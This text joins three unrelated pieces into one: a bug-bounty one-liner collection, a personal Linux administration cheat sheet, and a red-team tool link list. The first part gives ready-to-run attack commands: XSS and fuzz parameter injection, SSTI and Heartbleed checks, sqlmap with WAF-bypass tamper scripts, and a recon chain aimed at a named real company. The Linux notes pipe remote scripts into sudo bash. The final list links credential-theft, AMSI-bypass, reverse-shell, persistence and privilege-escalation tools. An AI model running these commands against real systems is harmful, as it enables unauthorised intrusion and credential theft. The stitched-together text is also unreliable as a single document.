assetfinder target.com | waybackurls | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"
```
### Hidden Params in JS:
```
cat subdomains.txt | gauplus -subs -t 100 -random-agent | sort -u --version-sort | httpx -silent -threads 2000 | grep -Eiv '(.eot|.jpg|.jpeg|.gif|.css|.tif|.tiff|.png|.ttf|.otf|.woff|.woff2|.ico|.svg|.txt|.pdf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -Eiv '\.js$|([^.]+)\.js|([^.]+)\.js\.[0-9]+$|([^.]+)\.js[0-9]+$|([^.]+)\.js[a-z][A-Z][0-9]+$' | sed 's/.*/&=FUZZ/g'); echo -e "\e[1;33m$url\e[1;32m$vars";done
```
### Extract sensitive end-point in JS:
```
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u
```
-------------------------
### SSTI:
```
for url in $(cat targets.txt); do python3 tplmap.py -u $url; print $url; done
```
---------------------------
## HeartBleed
```
cat urls.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line; safe; done
```
------------------
## Scan IPs
```
cat my_ips.txt | xargs -L100 shodan scan submit --wait 0
```
## Portscan
```
naabu -l targets.txt -rate 3000 -retries 3 -warm-up-time 0 -rate 150 -c 50 -ports 1-65535 -silent -o out.txt
```
## Screenshots using Nuclei
```
nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -v
```
## IPs from CIDR
```
echo cidr | httpx -t 100 | nuclei -t ~/nuclei-templates/ssl/ssl-dns-names.yaml | cut -d " " -f7 | cut -d "]" -f1 | sed 's/[//' | sed 's/,/\n/g' | sort -u
```
## SQLmap Tamper Scripts - WAF bypass
```
sqlmap -u 'http://www.site.com/search.cmd?form_state=1' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
--no-cast --no-escape --dbs --random-agent
```
## Shodan Cli
```
shodan search Ssl.cert.subject.CN:"target.com" --field ip_str | httpx -silent | tee ips.txt
```
### ffuf txt output
```
ffuf -w wordlists.txt -u URL/FUZZ -r -ac -v &>> output.txt ; sed -i 's/\:\: Progress.*Errors.*\:\://g' output.txt ; sed -i 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' output.txt
```
### Ffuf json to only url
```
cat ffuf.json | jq | grep "url" | sed 's/"//g' | sed 's/url://g' | sed 's/^ *//' | sed 's/,//g'
```
## Recon Oneliner from Stok
```
subfinder -d moonpay.com -silent | anew moonpay-subs.txt | dnsx -resp -silent | anew moonpay-alive-subs-ip.txt | awk '{print $1}' | anew moonpay-alive-subs.txt | naabu -top-ports 1000 -silent | anew moonpay-openports.txt | cut -d ":" -f1 | naabu -passive -silent | anew moonpay-openports.txt | httpx -silent -title -status-code -mc 200,403,400,500 | anew moonpay-web-alive.txt | awk '{print $1}' | gospider -t 10 -q -o moonpaycrawl | anew moonpay-crawled.txt | unfurl format %s://dtp | httpx -silent -title -status-code -mc 403,400,500 | anew moonpay-crawled-interesting.txt | awk '{print $1}' | gau --blacklist eot,svg,woff,ttf,png,jpg,gif,otf,bmp,pdf,mp3,mp4,mov --subs | anew moonpay-gau.txt | httpx -silent -title -status-code -mc 200,403,400,500 | anew moonpay-web-alive.txt | awk '{print $1}'| nuclei -eid expired-ssl,tls-version,ssl-issuer,deprecated-tls,revoked-ssl-certificate,self-signed-ssl,kubernetes-fake-certificate,ssl-dns-names,weak-cipher-suites,mismatched-ssl-certificate,untrusted-root-certificate,metasploit-c2,openssl-detect,default-ssltls-test-page,wordpress-really-simple-ssl,wordpress-ssl-insecure-content-fixer,cname-fingerprint,mx-fingerprint,txt-fingerprint,http-missing-security-headers,nameserver-fingerprint,caa-fingerprint,ptr-fingerprint,wildcard-postmessage,symfony-fosjrouting-bundle,exposed-sharepoint-list,CVE-2022-1595,CVE-2017-5487,weak-cipher-suites,unauthenticated-varnish-cache-purge,dwr-index-detect,sitecore-debug-page,python-metrics,kubernetes-metrics,loqate-api-key,kube-state-metrics,postgres-exporter-metrics,CVE-2000-0114,node-exporter-metrics,kube-state-metrics,prometheus-log,express-stack-trace,apache-filename-enum,debug-vars,elasticsearch,springboot-loggers -ss template-spray | notify -silent
```
## Update golang
```
curl https://raw.githubusercontent.com/udhos/update-golang/master/update-golang.sh|sudo bash
```
## Censys CLI
```
censys search "target.com" --index-type hosts | jq -c '.[] | {ip: .ip}' | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+'
```
____________________________________________________________________________________________________________________________
## Support Me
<a href="https://www.buymeacoffee.com/0xPugazh" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
|
<!-- TOC -->
- [Linux Releases](#linux-releases)
- [Install](#install)
- [Download](#download)
- [Debian](#debian)
- [Ubuntu](#ubuntu)
- [Mirrors](#mirrors)
- [Bash](#bash)
- [tmux](#tmux)
- [Init](#init)
- [login & non-login shells](#login--non-login-shells)
- [supervisord](#supervisord)
- [Exit code](#exit-code)
- [Syslog Message Severities](#syslog-message-severities)
- [Signals](#signals)
- [kill](#kill)
- [top](#top)
- [Glances - A top/htop alternative - Python](#glances---a-tophtop-alternative---python)
- [User & Permission](#user--permission)
- [add user to group](#add-user-to-group)
- [password](#password)
- [sudoers](#sudoers)
- [chown](#chown)
- [Package Management](#package-management)
- [Redhat](#redhat)
- [Ubuntu](#ubuntu)
- [Debian](#debian)
- [experimental](#experimental)
- [dpkg](#dpkg)
- [apt](#apt)
- [ssh server](#ssh-server)
- [Grub](#grub)
- [grub-customizer](#grub-customizer)
- [boot .iso](#boot-iso)
- [boot repair](#boot-repair)
- [ubuntu](#ubuntu)
- [Serial](#serial)
- [client](#client)
- [Benchmark](#benchmark)
- [sshd](#sshd)
- [ssh redirect](#ssh-redirect)
- [web](#web)
- [wget](#wget)
- [curl](#curl)
- [files](#files)
- [find](#find)
- [grep](#grep)
- [compress/uncompress](#compressuncompress)
- [rsync](#rsync)
- [history without line numbers](#history-without-line-numbers)
- [hostname](#hostname)
- [font](#font)
- [SELinux](#selinux)
- [Dropbox](#dropbox)
- [link account](#link-account)
- [Ubuntu snap](#ubuntu-snap)
- [Proxy](#proxy)
- [JAVA_HOME](#java_home)
- [I18N & I10N](#i18n--i10n)
- [Chrome](#chrome)
- [AD](#ad)
- [cache diagnostics](#cache-diagnostics)
- [WOL](#wol)
- [Tools - Online](#tools---online)
- [CPU](#cpu)
- [check_cpu_core_mapping](#check_cpu_core_mapping)
- [USB Persistence](#usb-persistence)
- [kali](#kali)
- [ssh](#ssh)
- [tools](#tools)
- [Video](#video)
- [OpenCL](#opencl)
- [zFCP](#zfcp)
- [Diagram](#diagram)
- [diskless](#diskless)
<!-- /TOC -->
# Linux Releases
[RHEL](https://access.redhat.com/articles/3078) |
[Ubuntu](https://en.wikipedia.org/wiki/Ubuntu_version_history#Table_of_versions) |
[Debian](https://en.wikipedia.org/wiki/Debian_version_history#Release_table)
6.0 Squeeze 2.6.32 -> Security until February 2016
7 Wheezy 3.2 -> Security until May 2018
8 Jessie 3.16 -> Security until April/May 2020
9 Stretch 4.9 -> Security until June 2022
10 Buster 4.19 -> Security until June 2024
11 Bullseye 5.10 -> Security until June 2026
12 Bookworm 6.1 -> Security until June 2028
# Install
from existing: https://www.debian.org/releases/stretch/amd64/apds03.html.en
# Download
## Debian
https://www.debian.org/CD/live/
## Ubuntu
http://ftp.sjtu.edu.cn/ubuntu-cd/
http://archive.ubuntu.com/ubuntu/dists/bionic-updates/main/installer-amd64/current/images/netboot/mini.iso
( Mirror only http://us.archive.ubuntu.com/ , need proxy, local DNS not working )
Debug: Console 4 or /var/log/syslog
# Mirrors
- https://debgen.github.io/
- https://mirrors.tuna.tsinghua.edu.cn/help/debian/
apt install netselect-apt && netselect-apt -c china --nonfree
mv /etc/apt/sources.list /etc/apt/sources.list.ori && mv sources.list /etc/apt/
# Bash
https://www.gnu.org/software/bash/manual/bash.html
url=https://raw.githubusercontent.com/fzinfz/scripts/master/init.sh # alias & functions
source /dev/stdin <<< "$(curl -sS $url)"
set
-x debug
-T If set, any traps on DEBUG and RETURN are inherited
-o functrace/errtrace
shopt [-pqsu] [-o] [optname …]
-s: Enable (set) each optname.
-u: Disable (unset) each optname.
shopt -s expand_aliases # when the shell is not interactive
alias foo='...'
0: stdin; 1: stdout; 2: stderr # File descriptor
2>&1 >/dev/null
&>/dev/null
ssh-add 2>/dev/null
https://git.savannah.gnu.org/cgit/bash.git/
## tmux
ctrl+b x -> kill pane # /usr/share/doc/tmux/examples/screen-keys.conf
cat /usr/share/doc/tmux/examples/screen-keys.conf | grep '\bbind \w'
# Init
|Level|Desc|
|---|---|
|0|Halt the system.|
|1|Single-user mode (for special administration).|
|2|Local Multiuser with Networking but without network service (like NFS)|
|3|Full Multiuser with Networking|
|4|Not Used|
|5|Full Multiuser with Networking and X Windows(GUI)|
|6|Reboot.|
ls -R -l /etc/rc*
ls -l /usr/lib/systemd # check `systemd` page for more
ls -l /usr/share/upstart # last release 2014; 3 years ago
ls -l /etc/init.d # SysV init
cat /etc/modules-load.d/*
apt install systemd-sysv # make link: /sbin/init -> /lib/systemd/systemd
## login & non-login shells
https://www.gnu.org/software/bash/manual/html_node/Bash-Startup-Files.html
login shells:
/etc/profile
~/.bash_profile(?-> ~/.bashrc), ~/.bash_login, and ~/.profile
exit: ~/.bash_logout
non-login shells:
~/.bashrc
# echo $0 : `shopt login_shell` \| $-
-bash : login_shell on | himBHs
# bash
# echo $0 : `shopt login_shell` \| $-
bash : login_shell off | himBHs
# bash -c 'echo $0 : `shopt login_shell` \| $-'
bash : login_shell off | hBc
## supervisord
http://supervisord.org/running.html
# Exit code
http://tldp.org/LDP/abs/html/exitcodes.html
1 Catchall for general errors
2 Misuse of shell builtins
126 Command invoked cannot execute
127 "command not found" illegal_command Possible problem with $PATH or a typo
128+n Fatal error signal "n"
kill -9 $PPID of script $? returns 137 (128 + 9)
130 Script terminated by Control-C
# Syslog Message Severities
https://tools.ietf.org/html/rfc5424#section-6.2.1
0 Emergency: system is unusable
1 Alert: action must be taken immediately
2 Critical: critical conditions
3 Error: error conditions
4 Warning: warning conditions
5 Notice: normal but significant condition
6 Informational: informational messages
7 Debug: debug-level messages
# Signals
kill -l
1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP
6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL ... 64) SIGRTMAX
# kill
pkill -KILL -u {username}
# top
* 1 - Single Cpu Off (thus multiple cpus)
* c - Command line Off (name, not cmdline)
* i - Idle tasks On (show all tasks)
j - Str align right Off (not right justify)
V - Forest view On (show as branches)
f - sort/hide columns
(`*') could be overridden through the command-line.
## Glances - A top/htop alternative - Python
https://github.com/nicolargo/glances
pip install glances[action,browser,cloud,cpuinfo,chart,docker,export,folders,gpu,ip,raid,snmp,web,wifi]
# User & Permission
## add user to group
sudo adduser foobar www-data
sudo usermod -a -G ftp tony
## password
echo user:pwd | chpasswd
## sudoers
sudo visudo
root ALL=(ALL) ALL # {terminals}=({users}) {commands}
%supergroup ALL=(ALL) NOPASSWD:ALL
## chown
chown -h myuser:mygroup mysymbolic
# Package Management
## Redhat
Free RHEL: https://developers.redhat.com/articles/no-cost-rhel-faq/
subscription-manager register
subscription-manager attach --auto
subscription-manager repos --enable rhel-7-server-optional-rpms
subscription-manager repos --enable rhel-7-server-extras-rpms
yum install epel-release
rm -f /var/run/yum.pid <PID> && yum remove PackageKit
yum-config-manager --disable c7-media
yum --nogpgcheck localinstall xx.rpm
### EPEL
http://elrepo.org/tiki/tiki-index.php
rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org
rpm -Uvh http://www.elrepo.org/elrepo-release-7.0-3.el7.elrepo.noarch.rpm
yum install yum-plugin-fastestmirror
yum --enablerepo=elrepo-kernel install kernel-ml
## Ubuntu
Main - Canonical-supported free and open-source software.
Universe - Community-maintained free and open-source software.
Restricted - Proprietary drivers for devices.
Multiverse - Software restricted by copyright or legal issues.
# https://mirror.tuna.tsinghua.edu.cn/help/ubuntu/
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial main restricted universe multiverse
## Debian
→ experimental
→ unstable(Sid) → testing → stable
Unstable - repository where new & untested packages are introduced.
Testing - repository with packages from unstable, if no bug are found within 10 days.
`main` consists of DFSG-compliant packages, which do not rely on software outside this area to operate. These are the only packages considered part of the Debian distribution.
`contrib` packages contain DFSG-compliant software, but have dependencies not in main (possibly packaged for Debian in non-free).
`non-free` contains software that does not comply with the DFSG.
deb http://mirror.sjtu.edu.cn/debian/ bullseye main contrib non-free
### experimental
deb http://mirror.sjtu.edu.cn/debian/ experimental main contrib non-free
apt install -t experimental linux-image-amd64 # latest kernel
## dpkg
dpkg --get-selections # list installed
To install .deb manually, visit `linux/kernel` page.
## apt
```
apt-get install linux-base -t jessie-backports
apt-cache search linux-image | grep linux-image-4
apt install linux-image-4.10.0-9-generic linux-image-extra-4.10.0-9-generic
apt show linux-image-extra-4.10*
apt-get install --only-upgrade docker-engine
apt policy docker-ce | head -n 20
apt-get autoclean
apt list --installed
rm -r /var/lib/apt/lists/*
```
echo 'Acquire::http::Proxy "http://192.168.88.25:7890"; ' > /etc/apt/apt.conf.d/proxy
## ssh server
deb http://.../debian/ buster main contrib non-free
apt install openssh-server # not "openssl"
# fix: userauth_pubkey: key type ssh-rsa not in PubkeyAcceptedAlgorithms [preauth]
PubkeyAcceptedAlgorithms +ssh-rsa
# Grub
grub2-mkconfig -o /boot/grub2/grub.cfg
awk -F\' '/menuentry / {print $2}' /boot/grub/grub.cfg
grub2-set-default 'CentOS Linux (4.9.0-rc8-amd64) 7 (Core)'
grub2-editenv list
fix: https://www.supergrubdisk.org/category/download/
## grub-customizer
sudo add-apt-repository ppa:danielrichter2007/grub-customizer
sudo apt-get update
sudo apt-get install grub-customizer
## boot .iso
https://netboot.xyz/docs/booting/grub
apt install grub-imageboot
mkdir /boot/images && cd /boot/images
wget https://boot.netboot.xyz/ipxe/netboot.xyz.iso
update-grub2
# boot repair
https://sourceforge.net/p/boot-repair-cd/home/Home/
apt install linux-image-* # if vmlinuz & initrd.img missing
## ubuntu
sudo add-apt-repository ppa:yannubuntu/boot-repair
sudo apt-get update
sudo apt-get install -y boot-repair && boot-repair
# Serial
https://help.ubuntu.com/community/SerialConsoleHowto
GRUB_CMDLINE_LINUX="console=tty0 console=ttyS0,115200n8"
## client
screen /dev/ttyUSB0 115200
picocom -b 115200 /dev/ttyUSB0
# Benchmark
http://www.brendangregg.com/Perf/linux_benchmarking_tools.png
```
sysbench --test=cpu --cpu-max-prime=20000 --num-threads=32 run
wget http://www.numberworld.org/y-cruncher/y-cruncher%20v0.7.9.9510-static.tar.xz
tar -xf y-cruncher*.tar.xz
```
# sshd
mobaxterm login failed: No supported authentication methods
PubkeyAcceptedAlgorithms +ssh-rsa # sshd_config # journalctl -u ssh
# ssh redirect
ssh -L 9000:public.com:80 # visit local:9000 -> public.com:80
ssh -L 0.0.0.0:54321:127.0.0.1:54321 remote -p 22
ssh -R 9000:localhost:3000 # visit remote:9000 -> local:3000, "GatewayPorts yes" in sshd_config
-nNT -L ... # port forwarding only, no shell
# web
## wget
wget -O diff_name.zip http://...
## curl
curl -O http://...
curl -o diff_name.zip http://
curl -sSL $1
-f, --fail Fail silently (no output at all) on HTTP errors (H)
-s, --silent Silent mode (don't output anything)
-S, --show-error Show error. With -s, make curl show errors when they occur
-L, --location Follow redirects (H)
-o, --output FILE Write to FILE instead of stdout
-O, --remote-name Write output to a file named as the remote file
# files
String replace: http://unix.stackexchange.com/questions/112023/how-can-i-replace-a-string-in-a-files
apt-get install mlocate
updatedb
locate -S
lsof -p <PID>
ls --help | grep -E '[-][tr]\b'
-r, --reverse reverse order while sorting
extension -X, size -S, time -t, version -v
-t sort by modification time, newest first
mkdir -p /not/existing/folder
cat > file <<'EOL'
EOL
ncdu --exclude='/root/data/*' /
du -hcd 2 / | more
du -a / | sort -n -r | head -n 20
ls -1 $PWD | wc -l # count files
file /bin/ps
ldd /bin/ps
## find
find /home -iname tecmint.txt
find $1 -iname $2
# find . ! -readable / -writable / -executabl
# find . ! -perm -g=w
find -regextype posix-extended -regex ".*[.](py|sh)" -exec chmod +x {} \;
## grep
grep --color=auto -rn -P "${regex}" ${path}
# -r, --recursive like --directories=recurse
# -n, --line-number print line number with output lines
# -P, --perl-regexp PATTERN is a Perl regular expression
## compress/uncompress
gunzip file.gz
tar -czvf name-of-archive.tar.gz /path/to/directory-or-file # Compress
tar -tvf my-data.tar.gz '*.py'
tar -zxvf toExtract.tar.gz
tar -xvf {tarball.tar} {special_file} -C /target/directory
tar -cf archive.tar foo bar # Create archive.tar from files foo and bar.
tar -tvf archive.tar # List all files in archive.tar verbosely.
tar -xf archive.tar # Extract all files from archive.tar.
-t, --list list the contents of an archive
-j, --bzip2 filter the archive through bzip2
-c, --create create a new archive
-x, --extract, --get extract files from an archive
-z, --gzip, --gunzip, --ungzip filter the archive through gzip
-v, --verbose verbosely list files processed
-f, --file=ARCHIVE use archive file or device ARCHIVE
zip [options] zipfile files_list
-r recurse into directories
-x exclude the following names
-v verbose operation/print version info
-m move into zipfile (delete OS files) !!
-d delete entries in zipfile !!!
-u update: only changed or new files
xz --decompress file.xz # -dgrub # unxz
## rsync
rsync -aP -e "ssh -p $3" $1 root@$2
rsync -aP /root/_bin root@remote:/root
rsync -aP -e "ssh -p 10220" /local root@remote:/dir --remove-source-files
-v, --verbose increase verbosity
-a, --archive archive mode; equals -rlptgoD (no -H,-A,-X)
--no-OPTION turn off an implied OPTION (e.g. --no-D)
-r, --recursive recurse into directories
-l, --links copy symlinks as symlinks
-p, --perms preserve permissions
-o, --owner preserve owner (super-user only)
-g, --group preserve group
-D same as --devices --specials
-t, --times preserve modification times
-S, --sparse handle sparse files efficiently
-e, --rsh=COMMAND specify the remote shell to use
--partial keep partially transferred files
--partial-dir=DIR put a partially transferred file into DIR
-z, --compress compress file data during the transfer
--progress show progress during transfer
-P same as --partial --progress
# history without line numbers
history | cut -c 8-
-a append history lines from this session to the history file ~/.bash_history
# hostname
hostnamectl set-hostname GZ2C8G
# font
```
apt-get install xfonts-base
```
# SELinux
```
getenforce
semanage port -a -t mongod_port_t -p tcp 27017
```
# Dropbox
## link account
`~/.dropbox-dist/dropboxd`
dropboxd will create a ~/Dropbox folder and start synchronizing it after this step!
unlink: https://www.dropbox.com/account#security
# Ubuntu snap
run without `root`
## Proxy
vi /etc/environment
systemctl restart snapd
# JAVA_HOME
echo export JAVA_HOME="/usr/lib/jvm/java-1.8.0-openjdk" >> /etc/profile
# I18N & I10N
apt install -y locales-all
locale -a
dpkg-reconfigure locales
yum grouplist chinese-support
sudo apt-get install -y ttf-wqy-microhei #文泉驿-微米黑
sudo apt-get install -y ttf-wqy-zenhei #文泉驿-正黑
sudo apt-get install -y xfonts-wqy #文泉驿-点阵宋体
# Chrome
chromium --no-sandbox # start as root
# AD
https://wiki.samba.org/index.php/Setting_up_Samba_as_an_NT4_PDC_(Quick_Start)
# cache diagnostics
https://hoytech.com/vmtouch/
git clone https://github.com/hoytech/vmtouch.git
cd vmtouch && make && sudo make install
Discovering which files your OS is caching
Telling the OS to cache or evict certain files or regions of files
Locking files into memory so the OS won't evict them
Preserving virtual memory profile when failing over servers
Keeping a "hot-standby" file-server
Plotting filesystem cache usage over time
Maintaining "soft quotas" of cache usage
Speeding up batch/cron jobs
# WOL
ethtool enp1s0 | grep Wake-on
p (PHY activity)
u (unicast activity)
m (multicast activity)
b (broadcast activity)
g (magic packet activity) *
a (ARP activity)
d (disabled)
# Tools - Online
http://explainshell.com/
# CPU
getconf LONG_BIT
## check_cpu_core_mapping
https://www.ibm.com/support/knowledgecenter/en/SSQPD3_2.6.0/com.ibm.wllm.doc/mappingcpustocore.html
same physical/core ID =》 simultaneous multi threads (SMTs) / HT
cat /proc/cpuinfo | grep -P 'processor|physical id|core id|^$'
pip install walnut # pretty print
for c in sorted([ ( int(c['processor']), int(c['physical id']), int(c['core id']) ) for c in cpu.dict().values()]): print c
# USB Persistence
https://docs.kali.org/downloading/kali-linux-live-usb-persistence
http://antix.mepis.org/index.php?title=Using_liveusb_with_persistence
# kali
x86/M1/Live/VM/WSL/etc: https://www.kali.org/get-kali
Docker: https://hub.docker.com/u/kalilinux/
# ssh
Since 2022.1: https://www.kali.org/docs/general-use/ssh-configuration/
- kali-tweaks -> Hardening -> Strong Security (the default) and Wide Compatibility
ls -l /etc/ssh/ssh_host_*
systemctl disable regenerate-ssh-host-keys.service
## tools
https://www.kali.org/tools/
screenshots/cheat sheet: https://www.comparitech.com/net-admin/kali-linux-cheat-sheet/#Kali_Linux_tools
# Video
https://askubuntu.com/questions/28033/how-to-check-the-information-of-current-installed-video-drivers
dpkg -l amdgpu-pro
glxinfo | grep direct
GALLIUM_HUD=help glxgears
# OpenCL
installable client driver loader (ICD Loader) may expose multiple separate vendor installable client drivers (Vendor ICDs) for OpenCL.
sudo apt install ocl-icd-opencl-dev
# zFCP
device driver that supplements the Linux SCSI stack.
![](https://www.ibm.com/support/knowledgecenter/linuxonibm/com.ibm.linux.z.lgdd/lxzfcp.jpg)
# Diagram
![](https://upload.wikimedia.org/wikipedia/commons/thumb/7/7b/Free_and_open-source-software_display_servers_and_UI_toolkits.svg/1573px-Free_and_open-source-software_display_servers_and_UI_toolkits.svg.png)
# diskless
https://help.ubuntu.com/community/DisklessUbuntuHowto
https://drbl.org/
docker run --network=host -d leejoneshane/drbl-server
http://web.mst.edu/~vojtat/pegasus/administration.htm
based on Scientific Linux 7 / CentOS 7 / Red Hat Enterprise Linux 7 |
# Awesome-Red-Team-Operation
# PenTest and Red Teams Tools by Joas and S3cur3Th1sSh1t
## Powershell Scripts
- https://github.com/S3cur3Th1sSh1t/WinPwn
- https://github.com/dafthack/MailSniper
- https://github.com/putterpanda/mimikittenz
- https://github.com/dafthack/DomainPasswordSpray
- https://github.com/mdavis332/DomainPasswordSpray
- https://github.com/jnqpblc/SharpSpray
- https://github.com/Arvanaghi/SessionGopher
- https://github.com/samratashok/nishang
- https://github.com/PowerShellMafia/PowerSploit
- https://github.com/fdiskyou/PowerOPS
- https://github.com/giMini/PowerMemory
- https://github.com/Kevin-Robertson/Inveigh
- https://github.com/MichaelGrafnetter/DSInternals
- https://github.com/PowerShellEmpire/PowerTools
- https://github.com/FuzzySecurity/PowerShell-Suite
- https://github.com/hlldz/Invoke-Phant0m
- https://github.com/leoloobeek/LAPSToolkit
- https://github.com/n00py/LAPSDumper
- https://github.com/sense-of-security/ADRecon
- https://github.com/adrecon/ADRecon
- https://github.com/S3cur3Th1sSh1t/Grouper
- https://github.com/l0ss/Grouper2
- https://github.com/NetSPI/PowerShell
- https://github.com/NetSPI/PowerUpSQL
- https://github.com/GhostPack
- https://github.com/Kevin-Robertson/Powermad
## AMSI Bypass
- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
- https://github.com/Flangvik/AMSI.fail
- https://github.com/p3nt4/PowerShdll
- https://github.com/jaredhaight/PSAttack
- https://github.com/Cn33liz/p0wnedShell
- https://github.com/cobbr/InsecurePowerShell
- https://github.com/bitsadmin/nopowershell
- https://github.com/Mr-Un1k0d3r/PowerLessShell
- https://github.com/OmerYa/Invisi-Shell
- https://github.com/Hackplayers/Salsa-tools
- https://github.com/padovah4ck/PSByPassCLM
- https://github.com/rasta-mouse/AmsiScanBufferBypass
- https://github.com/itm4n/VBA-RunPE
- https://github.com/cfalta/PowerShellArmoury
- https://github.com/Mr-B0b/SpaceRunner
- https://github.com/RythmStick/AMSITrigger
- https://github.com/rmdavy/AMSI_Ordinal_Bypass
- https://github.com/mgeeky/Stracciatella
- https://github.com/med0x2e/NoAmci
- https://github.com/rvrsh3ll/NoMSBuild
- https://github.com/bohops/UltimateWDACBypassList
- https://github.com/jxy-s/herpaderping
- https://github.com/Cn33liz/MSBuildShell
## Payload Hosting
- https://github.com/kgretzky/pwndrop
- https://github.com/sc0tfree/updog
## Network Share Scanner
- https://github.com/SnaffCon/Snaffler
- https://github.com/djhohnstein/SharpShares
- https://github.com/vivami/SauronEye
- https://github.com/leftp/VmdkReader
## Reverse Shellz
- https://github.com/xct/xc
- https://github.com/cytopia/pwncat
- https://github.com/Kudaes/LOLBITS
## Backdoor Finder
- https://github.com/linuz/Sticky-Keys-Slayer
- https://github.com/ztgrace/sticky_keys_hunter
- https://github.com/countercept/doublepulsar-detection-script
## Pivoting
- https://github.com/0x36/VPNPivot
- https://github.com/securesocketfunneling/ssf
- https://github.com/p3nt4/Invoke-SocksProxy
- https://github.com/sensepost/reGeorg
- https://github.com/hayasec/reGeorg-Weblogic
- https://github.com/nccgroup/ABPTTS
- https://github.com/RedTeamOperations/PivotSuite
- https://github.com/trustedsec/egressbuster
- https://github.com/vincentcox/bypass-firewalls-by-DNS-history
- https://github.com/shantanu561993/SharpChisel
- https://github.com/jpillora/chisel
- https://github.com/esrrhs/pingtunnel
- https://github.com/sysdream/ligolo
- https://github.com/nccgroup/SocksOverRDP
- https://github.com/blackarrowsec/mssqlproxy
## Persistence on Windows
- https://github.com/fireeye/SharPersist
- https://github.com/outflanknl/SharpHide
- https://github.com/HarmJ0y/DAMP
## Framework Discovery
- https://github.com/Tuhinshubhra/CMSeeK
- https://github.com/Dionach/CMSmap - Wordpress, Joomla, Drupal Scanner
- https://github.com/wpscanteam/wpscan
- https://github.com/Ekultek/WhatWaf
- https://github.com/KingOfBugbounty/KingOfBugBountyTips
## Framework Scanner / Exploitation
- https://github.com/wpscanteam/wpscan - wordpress
- https://github.com/n00py/WPForce
- https://github.com/m4ll0k/WPSeku https://github.com/swisskyrepo/Wordpresscan
- https://github.com/rastating/wordpress-exploit-framework
- https://github.com/coldfusion39/domi-owned - lotus domino
- https://github.com/droope/droopescan - Drupal
- https://github.com/whoot/Typo-Enumerator - Typo3
- https://github.com/rezasp/joomscan - Joomla
## File / Directory / Parameter discovery
- https://github.com/OJ/gobuster
- https://github.com/nccgroup/dirble
- https://github.com/maK-/parameth
- https://github.com/devanshbatham/ParamSpider - Mining parameters from dark corners of Web Archives
- https://github.com/s0md3v/Arjun - 💗
- https://github.com/Cillian-Collins/dirscraper - Directory lookup from Javascript files
- https://github.com/hannob/snallygaster
- https://github.com/maurosoria/dirsearch
- https://github.com/s0md3v/Breacher - Admin Panel Finder
- https://github.com/mazen160/server-status_PWN
- https://github.com/helviojunior/turbosearch
## Rest API Audit
- https://github.com/microsoft/restler-fuzzer - RESTler is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services.
- https://github.com/flipkart-incubator/Astra
## Windows Privilege Escalation / Audit
- https://github.com/itm4n/PrivescCheck - Privilege Escalation Enumeration Script for Windows
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS - powerfull Privilege Escalation Check Script with nice output
- https://github.com/AlessandroZ/BeRoot
- https://github.com/rasta-mouse/Sherlock
- https://github.com/hfiref0x/UACME - UAC
- https://github.com/rootm0s/WinPwnage - UAC
- https://github.com/abatchy17/WindowsExploits
- https://github.com/dafthack/HostRecon
- https://github.com/sensepost/rattler - find vulnerable dlls for preloading attack
- https://github.com/WindowsExploits/Exploits
- https://github.com/Cybereason/siofra - dll hijack scanner
- https://github.com/0xbadjuju/Tokenvator - admin to system
- https://github.com/MojtabaTajik/Robber
- https://github.com/411Hall/JAWS
- https://github.com/GhostPack/SharpUp
- https://github.com/GhostPack/Seatbelt
- https://github.com/A-mIn3/WINspect
- https://github.com/hausec/ADAPE-Script
- https://github.com/SecWiki/windows-kernel-exploits
- https://github.com/bitsadmin/wesng
- https://github.com/rasta-mouse/Watson
## LinkedIn
- https://www.linkedin.com/in/joas-antonio-dos-santos
## Windows Privilege Abuse (Privilege Escalation)
- https://github.com/gtworek/Priv2Admin - Abuse Windows Privileges
- https://github.com/itm4n/UsoDllLoader - load malicious dlls from system32
- https://github.com/TsukiCTF/Lovely-Potato - Exploit potatoes with automation
- https://github.com/antonioCoco/RogueWinRM - from Service Account to System
- https://github.com/antonioCoco/RoguePotato - Another Windows Local Privilege Escalation from Service Account to System
- https://github.com/itm4n/PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019
- https://github.com/BeichenDream/BadPotato - itm4ns Printspoofer in C#
- https://github.com/itm4n/FullPowers - Recover the default privilege set of a LOCAL/NETWORK SERVICE account
## Exfiltration
- https://github.com/gentilkiwi/mimikatz
- https://github.com/GhostPack/SafetyKatz
- https://github.com/Flangvik/BetterSafetyKatz - Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory.
- https://github.com/GhostPack/Rubeus
- https://github.com/Arvanaghi/SessionGopher
- https://github.com/peewpw/Invoke-WCMDump
- https://github.com/tiagorlampert/sAINT
- https://github.com/AlessandroZ/LaZagneForensic - remote lazagne
- https://github.com/eladshamir/Internal-Monologue
- https://github.com/djhohnstein/SharpWeb - Browser Creds gathering
